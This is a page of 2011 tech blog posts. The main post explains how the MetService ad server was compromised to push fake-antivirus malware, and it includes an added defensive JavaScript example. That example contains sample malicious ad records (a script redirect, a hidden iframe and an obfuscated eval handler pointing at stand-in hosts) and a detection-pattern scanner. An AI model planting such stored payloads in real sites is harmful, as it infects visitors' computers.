My window to the world


Cleaning up the Metservice infection

By Mauricio Freitas, posted: 18-Aug-2011 10:02

During the Great New Zealand Snowstorm 2011 the MetService web site was probably one of the most visited in the country. Unfortunately someone thought it would also be a great time to break into MetService's online advertising platform and plant a little Trojan horse.

What happened is that when serving ads the MetService web site was also unknowingly distributing a third-party piece of code. This little piece of code would be executed by the user's web browser and silently download and install malware on the visitor's computer.

To make it clear: you didn't need to click an ad to load this malware, because its code was served directly by the ad server and executed by your browser as part of the page. The infection wasn't delivered by an ad. The same delivery method could be applied to any other database-driven website that renders stored content into its pages. It's not an "online advertising problem".

Here is the official MetService email I received when they started the clean up process on their server:

At around 8pm last night, Tuesday 16 August, MetService's web support team identified an issue with its ad server. The ad server was immediately shut down to protect client browsers and prevent further problems; at no time was metservice.com unavailable to the public. Prior to this we had received no reports of any issues.

We now know that the ad server was compromised by a malicious attack, through a vulnerability which allowed someone to upload a binary file into the database. This file contained JavaScript code which redirects the browser to a website which downloads malware files to the client machine.

Over the past week, MetService's website has experienced record numbers of visitors due to the severe weather being experienced across the country. The site has handled this record traffic well. The popularity of the site no doubt made it a target for this attack.

An upgrade incorporating a fix is now being installed in order to resolve the issue. The ad server database is also in the process of being cleaned and rebuilt. We have responded to tweets on the issue starting just before 10am this morning, and will continue to respond to users' concerns as they arise.

While there's still an ongoing discussion on Geekzone (where it seems it was first reported), at least one of the installed pieces of malware is Personal Shield Pro, a fake security program that collects personal information while pretending to be a legitimate product, and at some point may even ask for credit card details to unlock its "cleaning" feature, which obviously does nothing.

It seems the malware was planted through the execution of JavaScript code that would call a Java program (JavaScript and Java are two different things). The Java program seemed to take advantage of a known vulnerability and use it to load the final program onto the computer. It looks like the program itself could not be loaded directly by the browser, so it had to go through Java. In this case it seems people running old versions of Java, without the fix for that vulnerability, were the ones infected.
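The chain described in the MetService email and the paragraph above is worth making concrete. What follows is an added example, not code from MetService, from the original post or from the Geekzone discussion. It assumes a hypothetical ad server that stores ad markup in a database table and writes it straight into the page, shows beside it a hardened version that stores only structured fields (click URL, image URL, alt text) and builds the HTML itself, and adds a small scanner for records that already carry script, iframe, inline-event or redirect patterns. The records, hostnames and field names are constructed for the example; nothing in it reproduces the actual MetService payload or the Java exploit.

```javascript
// Added example (not MetService's code): how stored markup in an ad table
// becomes script in every visitor's browser, a renderer that cannot be
// poisoned that way, and a scanner for records that already carry a payload.
// The ad server, records, hostnames and field names are constructed.

// Constructed ad table. Record 1 is a normal creative; 2, 3 and 4 are the
// kind of rows an attacker who can write to the table would leave behind.
const SAMPLE_RECORDS = [
  { id: 1, html: '<a href="https://ads.example.invalid/c/1"><img src="https://ads.example.invalid/b1.png" alt="Winter sale"></a>' },
  { id: 2, html: '<img src="https://ads.example.invalid/b2.png"><script>window.location="http://bad.example.invalid/x.php"</script>' },
  { id: 3, html: '<iframe src="http://bad.example.invalid/loader.html" width="1" height="1"></iframe>' },
  { id: 4, html: '<img src="x" onerror="eval(unescape(\'%61%6c%65%72%74\'))">' },
];

// Unsafe renderer: whatever is in the database goes into the page verbatim.
// A <script> redirect stored here runs for every visitor, click or no click.
function renderAdUnsafe(record) {
  return `<div class="ad">${record.html}</div>`;
}

function escapeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function isHttpUrl(value) {
  try {
    const url = new URL(value);
    return url.protocol === 'https:' || url.protocol === 'http:';
  } catch {
    return false;
  }
}

// Hardened renderer: the creative is stored as fields, not markup, so the
// database can never supply a tag; the renderer owns the HTML and escapes
// every field it interpolates. Anything that is not an http(s) URL is
// refused, so a stored "javascript:" click URL is rejected, not rendered.
function renderAdSafe(creative) {
  if (!isHttpUrl(creative.clickUrl) || !isHttpUrl(creative.imageUrl)) return null;
  return `<div class="ad"><a href="${escapeAttr(creative.clickUrl)}">` +
    `<img src="${escapeAttr(creative.imageUrl)}" alt="${escapeAttr(creative.alt || '')}"></a></div>`;
}

// Triage scanner for a table that may already be poisoned: flags records
// carrying script/iframe tags, inline event handlers, location redirects,
// common obfuscation calls, or Java applet/JAR references.
const SUSPECT_PATTERNS = [
  /<script\b/i,
  /<iframe\b/i,
  /\bon\w+\s*=/i,
  /javascript:/i,
  /\blocation\s*(=|\.href|\.replace)/i,
  /\b(eval|unescape|String\.fromCharCode)\s*\(/i,
  /<applet\b|\.jar\b|application\/x-java/i,
];

function scanAdRecords(records) {
  const hits = [];
  for (const record of records) {
    const matched = SUSPECT_PATTERNS.filter((re) => re.test(record.html)).map((re) => re.source);
    if (matched.length > 0) hits.push({ id: record.id, patterns: matched });
  }
  return hits;
}

// Stand-alone run: lists the poisoned records (ids 2, 3 and 4) with the
// patterns that caught them.
console.log(scanAdRecords(SAMPLE_RECORDS));
```

The scanner is a triage tool, not a sanitiser: a record it flags should be pulled and inspected, but a clean scan says nothing about obfuscated payloads the patterns don't cover. That is why the fix is to stop rendering stored markup at all, as the hardened renderer does, rather than to filter it on the way out.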

It's also not clear whether the third-party code was distributing one, two or more variants of malware: it's possible that it installed different types depending on which browser was being used, which operating system version the PC was running, and so on.

From the information we managed to collect on Geekzone, the main infection was really Personal Shield Pro. This can be removed with Malwarebytes, a free program (there's also a paid Pro version with more features).

To remove Personal Shield Pro follow these steps:

  • Reboot your PC and press F8 just before Windows starts loading
  • On the boot options screen select "Safe Mode with Networking" (the malware's own startup entries don't run in Safe Mode, which is what lets the scanner remove them cleanly)
  • Download Malwarebytes and install it
  • Run a full scan and let it remove everything it finds
  • Reboot normally and run a second scan to confirm nothing came back

This should clear the infection.

Obviously your PC could get infected again with the same thing if it stumbles upon another web site carrying the same or similar code. Here are some tips to keep it safe:

  • Make sure your Windows PC is always up to date with the latest patches and browser versions. If you are running Windows XP make sure you have Service Pack 3 installed and all Windows Updates after that. If you are running Windows 7 make sure you have Service Pack 1 and all Windows Updates after that. Check for new Windows Updates on the second Wednesday of each month (New Zealand time), which is when Microsoft's monthly release (the second Tuesday, US time) reaches us. Better still, set Windows Update to automatically download and install updates.
  • If you are running Internet Explorer on Windows XP you should have Internet Explorer 8. If you are running Internet Explorer on Windows 7 you should have Internet Explorer 9.
  • If you are running another browser (Chrome, Firefox, Opera, Safari) check that you are running its latest update.
  • If you are running any other program (especially ones that plug into your browser) make sure you always have all updates installed. This includes the Java runtime, Skype plugins, toolbars and any other program that changes the browser's behaviour. In this incident Java is the one that mattered: the exploit relied on an old, unpatched Java runtime, and if you don't use Java in the browser at all, disabling the plugin removes that attack path entirely.
  • You should install one antivirus program (free or paid) but not more than one. Multiple antivirus programs on the same PC will cause problems.
  • Earlier this year I posted a blog entry with links to a list of free security programs and you should read it.

If anyone in the security community could add or update any information posted here about this specific incident, please contact me. I'm also blocking comments on this blog post to avoid the predictable "Windows vs Mac OS vs Linux vs " or "Internet Explorer vs Firefox vs Chrome" flame wars.

UPDATE: for those interested in finding out how the Metservice ad server was compromised, this is a good read.

UPDATE: Although the Java runtime is multi-platform, the final payload affected only Windows PCs. Those of you running Mac OS X, Linux, iPads and other devices will not be affected.



To the good ISP people on Geekzone

By Mauricio Freitas, posted: 16-Aug-2011 15:37

In a previous blog post I lashed out at service companies that have problems with their help desk experience, and probably gave the impression that the contribution some of their people make in online media is not welcome.

That's not the case. They all do great work out there, fronting up for the company, enduring rude comments from people with no social skills (those who keep shouting "mine, mine, mine") and so on.

The post was about the broken processes, not about the people.

Here at Geekzone we can find some examples of great contributors, and I will list them in no particular order (ok, I will try to put company names in alphabetical order, and if I forget any, please remind me):



The broken help desk problem (Twitter will not fix it, you have to do it from inside)

By Mauricio Freitas, posted: 16-Aug-2011 12:23

Online channels cure everything! Social media help is here for you!

Twitter is a 140-character medium, and it seems people can't just take a tweet for what it is trying to convey (a personal opinion). Some people take it as a personal offence if something bad is said about an industry or activity, even when it's not directed at them. And some people expect a dissertation in 140 characters. So here is my "extended version".

It started when I posted this tweet: "Most annoying sentence used on Twitter is 'Sorry, how can we help?'... What about start with better, faster customer service to everyone?"

This is what I think. Extending that sentence: service providers' help desk experience is so broken that people get to Twitter (and other venues like Facebook, Geekzone, etc.) to complain, and only then get some action from the online team that rushes in with "Sorry you are having problems, how can we help?".

My tweet came from years of reading about help desk interactions on Twitter and Geekzone. Most of what I've read are horror stories. Usually there's a long wait (45 minutes is not unheard of, sometimes hours), a promise of a call back (that never happens), fault details that are never logged, so when the customer calls back the help desk says "this is the first I hear about it", "Contact Us" pages that are supposed to put people in contact with the help desk via email but from which no reply ever comes back, and so on.

So, my thought on "how can we help" is still "improve your customer service experience and make it work". This is not for telcos only, but all industries.

After my tweet, I got a reply from Paul Brislen, TUANZ CEO: "because usually that's the first time you hear the customer has an issue. Blissful ignorance before that point."

It may be. Sure, there are some cases in which customers don't even take the time to call the help desk. But that's not always the case.

Why would some customers go to online channels first instead of calling the help desk? Because they suspect no results will come out of that contact, and a friend of a friend told her "to post on Twitter, it's like a priority queue".

To the customers: this is the wrong approach, folks, because it's not helping the provider to "build a case". If you call the help desk and get a call logged, then over time there's a wealth of knowledge that can help everyone else.

To the providers: if customers call the help desk but nothing is logged, then the help desk is not helping itself (except for creating the illusion of "quick resolution" and a "high number of cases closed")*.

Customer service using online channels (I dislike "social media") seems to have a priority tag assigned. Sorry, but it looks like they are there to put out fires so the reputation is not too damaged.

Of course online channels can be used, for example as a crowdsourced sensor network, allowing providers to collect data indicating something is wrong. Say Telco A sees a wave of people complaining about broken services, for example slow iTunes downloads or intermittent problems accessing smh.com.au. This is probably faster and more accurate than their own monitoring in pointing out a bottleneck in the local distribution network, or a problem with their proxy servers.

Strangely I don't see this happening much, yet. If it is, it's not publicised.

There are many problems with "support" on Twitter and other channels. Authentication is one: how do you know this is the customer who can actually take actions on this account? Or how do you even know this is the actual customer, not an impersonator? Then there's the technical problem: it's really hard to get meaningful troubleshooting information in 140 characters. But most importantly, it is probably extremely hard to scale support on Twitter.

So, please fix your help desk. Provide excellent customer service; then I'd really believe you are using online channels for things other than putting out fires.

 

* Some time ago there were reports of mobile data connection problems with Vodafone and subsequent discussion. I might be wrong (Vodafone is welcome to post in the comments), but from what I found in talking to people, customers would call to log a fault, and the help desk would ask the customer to turn off the handset, remove the battery, wait five minutes and turn the phone on again. It would always "fix the problem", so no fault was logged. In my opinion the mobile operator missed the important information that a lot of people, with different handsets, were having connection problems. It wasn't just one model. It wasn't just in one specific location. It was spread across the country. Until someone wrote about it with detailed information, and then there was a scramble to get things fixed. This is just an example of not using the knowledge collected from help desk contacts to its advantage.



I’m on heello too

By Mauricio Freitas, posted: 11-Aug-2011 11:16

Yes, it's true. The Twitpic crowd has launched heello.com. You can find and follow me at heello.com/freitasm.



P2P will not be illegal in New Zealand

By Mauricio Freitas, posted: 3-Aug-2011 14:56

I've seen some comments around saying P2P is illegal come 1st September and the new copyright law is enacted.

To be clear: P2P is not illegal. It's the distribution of copyrighted material without the proper rights to do so that is.

P2P can also be used for software distribution, as well as distribution of content that is no longer under copyright, or content whose authors have decided to make it freely available (even if they still retain copyright).

Here are two web sites where you can find content legally available through P2P (torrents):



500,000 replies in forums and the winners...

By Mauricio Freitas, posted: 2-Aug-2011 12:24

When I started Geekzone a few years ago I didn't think I was going to meet so many good people around here.

With time and the help of an entire community, especially our volunteer moderators, Geekzone managed to capture a good audience in New Zealand and overseas. Numbers continue to go up, and discussions in our forums continue to attract hundreds of thousands of visitors every month. Those visitors come mainly from New Zealand, but also from the U.S., Canada, Australia and the UK, with smaller numbers from other countries.

I managed to make new friendships that span the globe. People who I've met over the years in our pizza evenings, coffee meetings and conferences everywhere.

When I saw we were approaching 500,000 replies in our forums, I contacted some of the local telco/tech companies and passed the hat around, asking for some prizes to distribute. The response was really good as you can see below

I intentionally did not announce there would be prizes, because we wanted genuine posts to win. We also decided to give some "consolation" prizes to people who got close to 500,000 but not quite. So here are the winners and the prize list!
To all three winners congratulations, and to everyone else thank you from the team for making Geekzone a great place.



Old UPS out, new UPS in: Eaton

By Mauricio Freitas, posted: 26-Jul-2011 20:19

In the last two months a couple of my Belkin UPSs (800VA and 1200VA) died. More likely the batteries needed replacement anyway. But it couldn't have come at a worse time: with all the power cuts in Wellington due to heating demand during the extreme cold, our desktops here at the Geekzone Home Office had a bouncy night...

So www.upspower.co.nz decided to let me try a couple of their UPSs: one small Eaton 3S UPS and the rack-mounted/tower Eaton 5PX 1500.

While the Eaton 3S was easy (plug it into the wall and plug a couple of devices into it), the Eaton 5PX is a different beast altogether. First, it comes in a 35 kg box. It ships with sliders and feet, so you choose the rack-mounted or tower form factor. It's a bit noisy because of a fast fan, but it packs a punch. Just look at the LCD pictures of the runtime lower in the post:

Will be using these for a while here and see how they perform...



Atlantis space shuttle: thanks for all the fish!

By Mauricio Freitas, posted: 21-Jul-2011 22:06

Amazing infrared shot of Atlantis (NASA Space Shuttle) after its last landing just a few minutes ago:

And a side shot:

Well done Challenger, Endeavour, Discovery and Atlantis. Well done to the crew and control. Amazing to have seen the first flight, and to have seen the last one, over 29 years of space exploration.



Scope of New Zealand copyright law changes limited to P2P file sharing

By Mauricio Freitas, posted: 21-Jul-2011 11:59

Sharing a release received from InternetNZ today:

InternetNZ (Internet New Zealand Inc) has obtained clarification from the Ministry of Economic Development (MED) that the intention of the Copyright (Infringing File Sharing) Amendment Act 2011 is to cover copyright infringement by online file sharing using peer-to-peer protocols only.

The new notices and penalty regime introduced by these amendments is not intended to cover video/music streaming websites or online file lockers.

InternetNZ Chief Executive Vikram Kumar says, "What this means is that watching videos on YouTube or via blinkx, streaming music from Grooveshark, and downloading from online file lockers like MediaFire and 4shared will not be subject to the changes introduced by the amendments to the law coming into force on 1 September 2011. MED's confirmation addresses some of the questions that arose when we were looking at the law changes in detail".

"It keeps the scope of the changes narrowly focussed on copyright infringements by online file sharing via peer-to-peer networks and applications. This will be welcomed by many people. However, despite the intentions behind the law, the definitive interpretation will come from decisions made by the Copyright Tribunal and Courts if this aspect of the law is ever tested."

"Streaming websites and online file lockers typically provide copyright owners with a more direct means of enforcing their rights.

Generally, this is achieved by copyright owners providing a notice directly to the website that infringing content is appearing on the site and needs to be removed. For example, YouTube has tools like Content ID and a Copyright Verification Tool that enable copyright owners to easily identify, control, and even remove their content from the site."

"This clarification doesn't mean that copyright infringements by means other than peer-to-peer applications and networks aren't covered by the Copyright Act. The Internet Service Providers' liability provisions inserted by the Copyright (New Technologies) Amendment Act 2008 of general infringement (92B), storing infringing material (92C), and caching (92E) still continue. Rights owners can continue to seek enforcement through the Courts. However, they can't use the new streamlined provisions of sections 122A to 122U for alleged infringements relating to Internet Service Providers' storage and caching of infringing content."

"This is a good time to emphasise that peer-to-peer technologies aren't in themselves bad. Quite the contrary. These technologies provide significant advantages for many legitimate uses, such as eliminating the single point of failure typical of client-server systems and distributing computing resources. For example, peer-to-peer technologies are extensively used by popular services like Facebook, Skype and Twitter as well as for efficient data distribution in scientific research and Linux distributions. So blocking peer-to-peer protocols rather than focussing on copyright infringement in response to the law changes is a bad response."

Explanatory note

"Streaming" is a technique for transferring data so that it can be processed as a steady and continuous stream. This allows a person to start watching online, say a video or TV show, without waiting to get the whole file. Typically, streaming is used in a one-to-many situation. "Peer-to-peer" on the other hand is a distributed architecture where peers are both consumers and suppliers. People can connect directly with other people, and it is therefore used in a many-to-many situation.

Examples of peer-to-peer protocols include Gnutella and BitTorrent.

Popular peer-to-peer software includes uTorrent, BitComet, FrostWire, Ares, LimeRunner, and Vuze.

Online file lockers are ways for storing and sharing a wide variety of files online. Examples of online file lockers include MediaFire and 4shared.



How Leica lenses are made

By Mauricio Freitas, posted: 13-Jul-2011 11:58

A brilliant video showing the technology behind the manufacture of Leica lenses. It explains why lenses are still so expensive:



freitasm's profile

Mauricio Freitas
Wellington
New Zealand


I live in New Zealand and my interests include mobile devices, good books, movies and food of course! 

I work for Intergen and I'm also the Geekzone admin. On Geekzone we publish news, reviews and articles on technology topics. The site also has some busy forums.
